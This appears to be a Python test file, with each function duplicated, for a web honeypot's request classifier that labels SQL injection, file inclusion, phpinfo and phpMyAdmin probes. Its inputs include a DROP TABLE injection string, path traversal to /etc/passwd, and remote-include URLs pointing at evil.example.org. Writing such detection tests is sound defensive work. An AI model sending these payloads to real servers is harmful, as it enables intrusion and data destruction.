def test_sqli_classifier(self): """Objective: Test classifier for SQL Injection requests Input: HTTPRequest with a generic sql injection attempt Expected Response: matched pattern to sqli Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/index.php?id=" or 1; drop talble users;--' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'sqli')
def test_login_classifier(self): """Objective: Test classifier for login requests Input: HTTPRequest with a generic authentication login attempt Expected Response: matched pattern to login Note: """ parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/login' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'login')
def test_robots_classifier(self): """Objective: Test classifier for robots.txt requests Input: HTTPRequest with an robots.txt GET request Expected Response: matched pattern to robots Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/robots.txt' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'robots')
def test_login_classifier(self): """Objective: Test classifier for login requests Input: HTTPRequest with a generic authentication login attempt Expected Response: matched pattern to login Note: """ parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/login' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'login')
def test_sqli_classifier(self): """Objective: Test classifier for SQL Injection requests Input: HTTPRequest with a generic sql injection attempt Expected Response: matched pattern to sqli Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/index.php?id=" or 1; drop talble users;--' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'sqli')
def test_robots_classifier(self): """Objective: Test classifier for robots.txt requests Input: HTTPRequest with an robots.txt GET request Expected Response: matched pattern to robots Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/robots.txt' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'robots')
def test_lfi_classifier(self): """Objective: Test classifier for LFI requests Input: HTTPRequest with different kind of local file includes attempts Expected Response: matched pattern to rfi Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/index.php?file=../../../../../../etc/passwd' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'lfi') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/index.php?file=../../../../../../etc/passwd%00' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'lfi')
def test_lfi_classifier(self): """Objective: Test classifier for LFI requests Input: HTTPRequest with different kind of local file includes attempts Expected Response: matched pattern to rfi Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/index.php?file=../../../../../../etc/passwd' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'lfi') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/index.php?file=../../../../../../etc/passwd%00' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'lfi')
def test_rfi_classifier(self): """Objective: Test classifier for RFI requests Input: HTTPRequest with different kind of remote file includes attempts Expected Response: matched pattern to rfi Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/index.php?file=http://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = '/index.php?file= http://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = '/index.php?file=https://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = '/index.php?file=ftp://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = '/index.php?file=ftps://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = 're/test.jsp?r=%22http://www.gogole.it/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'rfi')
def test_phpinfo_classifier(self): """Objective: Test classifier for phpinfo debug/test requests Input: HTTPRequest with an attempt to discover a generic phpinfo test page Expected Response: matched pattern to phpinfo Note: """ parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/phpinfo.php?ss' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpinfo') parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/phpinfo.php' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpinfo') parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/info.php' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpinfo') parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/info.php?page' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpinfo') parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/phpinfo.html' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpinfo')
def test_phpmyadmin_classifier(self): """Objective: Test classifier for phpmyadmin requests Input: HTTPRequest with a generic reference to phpmyadmin paths Expected Response: matched pattern to phpmyadmin Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/phpmyadmin/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/phpMyadmin/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/pma/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/PMA/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/phpMyAdmin-2.8.2/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request(parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin')
def test_rfi_classifier(self): """Objective: Test classifier for RFI requests Input: HTTPRequest with different kind of remote file includes attempts Expected Response: matched pattern to rfi Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/index.php?file=http://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = '/index.php?file= http://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = '/index.php?file=https://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = '/index.php?file=ftp://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = '/index.php?file=ftps://evil.example.org/t.txt?' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'rfi') parsed_request.method = 'GET' parsed_request.url = 're/test.jsp?r=%22http://www.gogole.it/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'rfi')
def test_phpinfo_classifier(self): """Objective: Test classifier for phpinfo debug/test requests Input: HTTPRequest with an attempt to discover a generic phpinfo test page Expected Response: matched pattern to phpinfo Note: """ parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/phpinfo.php?ss' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpinfo') parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/phpinfo.php' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpinfo') parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/info.php' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpinfo') parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/info.php?page' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpinfo') parsed_request = HTTPRequest() parsed_request.method = 'POST' parsed_request.url = '/phpinfo.html' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpinfo')
def test_phpmyadmin_classifier(self): """Objective: Test classifier for phpmyadmin requests Input: HTTPRequest with a generic reference to phpmyadmin paths Expected Response: matched pattern to phpmyadmin Note: """ parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/phpmyadmin/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/phpMyadmin/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/pma/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/PMA/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin') parsed_request = HTTPRequest() parsed_request.method = 'GET' parsed_request.url = '/phpMyAdmin-2.8.2/' parsed_request.version = 'HTTP/1.0' matched_pattern = self.requestClassifier.classify_request( parsed_request) self.assertTrue(matched_pattern == 'phpmyadmin')